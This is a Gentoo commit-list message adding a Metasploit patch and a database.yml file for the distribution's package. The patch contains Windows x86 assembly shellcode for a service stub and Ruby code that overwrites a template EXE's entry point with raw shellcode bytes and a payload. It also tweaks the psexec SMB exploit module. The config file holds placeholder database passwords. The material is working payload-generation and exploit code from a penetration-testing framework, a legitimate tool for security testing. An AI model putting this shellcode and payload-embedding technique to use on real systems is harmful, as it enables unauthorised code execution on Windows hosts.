* [gentoo-commits] gentoo-x86 commit in net-analyzer/metasploit/files: agix_psexec_pull-2657.patch database.yml
@ 2013-12-15 17:19 Richard Farina (zerochaos)
0 siblings, 0 replies; only message in thread
From: Richard Farina (zerochaos) @ 2013-12-15 17:19 UTC (permalink / raw
To: gentoo-commits
zerochaos 13/12/15 17:19:08
Added: agix_psexec_pull-2657.patch database.yml
Log:
importing new metasploit from pentoo overlay, major changes, enjoy the ride
(Portage version: 2.2.7/cvs/Linux x86_64, signed Manifest commit with key DD11F94A)
Revision Changes Path
1.1 net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
file : http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch?rev=1.1&view=markup
plain: http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch?rev=1.1&content-type=text/plain
Index: agix_psexec_pull-2657.patch
===================================================================
diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm 1970-01-01 01:00:00.000000000 +0100
+++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm 2013-11-20 11:50:48.256366095 +0100
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push byte 0x0
+push 0x32336970
+push 0x61766461
+push esp
+push 0x726774c
+call ebp ;load advapi32.dll
+push 0x00454349
+push 0x56524553
+mov ecx, esp ;ServiceTableEntry.SVCNAME
+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
+push 0x00000000
+push eax
+push ecx
+mov eax,esp
+push 0x00000000
+push eax
+push 0xCB72F7FA
+call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
+push 0x00000000
+push 0x56A2B5F0
+call ebp ;call ExitProcess(0)
+pop eax ;SvcCtrlHandler
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+cld ;SvcMain
+call me
+me:
+pop ebp
+sub ebp, 0xd6 ;ebp => hashFunction
+push 0x00464349
+push 0x56524553
+mov ecx, esp ;SVCNAME
+lea eax, [ebp+0xc9];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp ;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000004
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp ;SetServiceStatus RUNNING
\ No newline at end of file
diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 1970-01-01 01:00:00.000000000 +0100
+++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 2013-11-20 11:50:48.256366095 +0100
@@ -0,0 +1,17 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 189 bytes + strlen(libpath) + 1
+; Build: >build.py single_service_stuff
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_service.asm"
\ No newline at end of file
diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
--- metasploit-9999.orig/lib/msf/util/exe.rb 2013-11-20 11:50:31.748365346 +0100
+++ metasploit-9999/lib/msf/util/exe.rb 2013-11-20 11:50:48.256366095 +0100
@@ -402,36 +402,86 @@
case opts[:exe_type]
when :service_exe
+ exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
max_length = 8192
name = opts[:servicename]
- if name
- bo = pe.index('SERVICENAME')
- raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
- pe[bo, 11] = [name].pack('a11')
+ if not name
+ name = Rex::Text.rand_text_alpha(7)
end
-
- if not opts[:sub_method]
- pe[136, 4] = [rand(0x100000000)].pack('V')
+ #code_service could be encoded in the future
+ code_service =
+ "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+ "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
+ "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
+ "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
+ "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
+ "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
+ "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
+ "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
+ "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
+ "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
+
+ pe_header_size=0x18
+ section_size=0x28
+ characteristics_offset=0x24
+ virtualAddress_offset=0xc
+ sizeOfRawData_offset=0x10
+
+ sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
+ sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
+ sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
+
+ sections_header = []
+ exe._file_header.v['NumberOfSections'].times { |i|
+ sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
+ }
+
+ #look for section with entry point
+ sections_header.each do |sec|
+ virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
+ sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
+ characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
+ if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
+ #put this section writable
+ characteristics|=0x80000000
+ newcharacteristics = [characteristics].pack('L')
+ pe[sec[0],newcharacteristics.length]=newcharacteristics
+ end
end
+
+ #put the shellcode at the entry point, overwriting template
+ pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
+
when :dll
max_length = 2048
when :exe_sub
max_length = 4096
end
- bo = pe.index('PAYLOAD:')
- raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
+ if opts[:exe_type] != :service_exe
- if (code.length <= max_length)
- pe[bo, code.length] = [code].pack("a*")
- else
- raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
- end
+ bo = pe.index('PAYLOAD:')
+ raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
- if opts[:exe_type] == :dll
- mt = pe.index('MUTEX!!!')
- pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+ if (code.length <= max_length)
+ pe[bo, code.length] = [code].pack("a*")
+ else
+ raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
+ end
+
+ if opts[:exe_type] == :dll
+ mt = pe.index('MUTEX!!!')
+ pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+ end
end
return pe
@@ -463,7 +513,7 @@
def self.to_win32pe_service(framework, code, opts={})
# Allow the user to specify their own service EXE template
- set_template_default(opts, "template_x86_windows_svc.exe")
+ set_template_default(opts, "template_x86_windows.exe")
opts[:exe_type] = :service_exe
exe_sub_method(code,opts)
end
diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
--- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:31.988365357 +0100
+++ metasploit-9999/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:48.256366095 +0100
@@ -153,7 +153,7 @@
# Disconnect from the ADMIN$
simple.disconnect("ADMIN$")
else
- servicename = rand_text_alpha(8)
+ servicename = rand_text_alpha(7)
# Upload the shellcode to a file
print_status("Uploading payload...")
1.1 net-analyzer/metasploit/files/database.yml
file : http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/database.yml?rev=1.1&view=markup
plain: http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/database.yml?rev=1.1&content-type=text/plain
Index: database.yml
===================================================================
#
# The tests currently use the development user
# https://dev.metasploit.com/redmine/issues/8418
#
development:
adapter: "postgresql"
database: "msf_test_database"
username: "msf_test_user"
password: "secure"
port: 5432
host: "localhost"
pool: 256
timeout: 5
production:
adapter: "postgresql"
database: "msf_database"
username: "msf_user"
password: "secure"
port: 5432
host: "localhost"
pool: 256
timeout: 5
test:
adapter: "postgresql"
database: "msf_test_database"
username: "msf_test_user"
password: "secure"
port: 5432
host: "localhost"
pool: 256
timeout: 5
^ permalink raw reply [flat|nested] only message in thread
only message in thread, other threads:[~2013-12-15 17:19 UTC | newest]
Thread overview: (only message) (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2013-12-15 17:19 [gentoo-commits] gentoo-x86 commit in net-analyzer/metasploit/files: agix_psexec_pull-2657.patch database.yml Richard Farina (zerochaos)
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox